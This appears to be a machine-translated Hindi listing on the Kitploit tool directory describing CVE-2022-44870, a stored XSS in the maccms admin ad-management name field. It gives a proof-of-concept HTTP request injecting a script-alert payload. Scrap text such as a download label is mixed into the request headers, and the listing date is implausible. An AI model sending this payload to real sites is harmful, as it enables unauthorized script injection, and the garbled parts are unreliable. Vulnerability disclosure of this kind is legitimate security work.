Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-44870 — maccms admin+ xss हमले | Kitploit
उपकरण/GitHubGitHub/cedric1314/cve-2022-44870
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubcedric1314/cve-2022-44870

CVE-2022-44870

maccms admin+ xss हमले

रिपॉजिटरी देखें
23 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-44870

maccms admin+ xss हमले

अवलोकन

निर्माता की वेबसाइट जानकारी:https://maccms.pro

स्रोत कोड डाउनलोड पता : https://github.com/maccmspro/maccms10.git

  1. प्रभावित संस्करण: V2021.1000.2000

    图片
  2. कमजोरी विवरण

https://github.com/maccmspro/maccms10/issues/23

पृष्ठभूमि पर जाएं, बेसिक्स > एडी मैनेजमेंट > नाम पर जाएं,

नाम बॉक्स में payload1 डालें:

यह XSS हमले का कारण बन सकता है।

कमजोरी का नाम:स्टोरेज टाइप xss

कमजोरी का स्तर:मध्यम जोखिम

कमजोरी का स्थान: विज्ञापन प्रबंधन-->नाम

cat_title पर डालें

http://127.0.0.1/admin.php/admin/banner/infocat.html

图片

图片
  1. बार-बार होने वाली कमजोरियाँ और POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

टूल डाउनलोड करें

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111

图片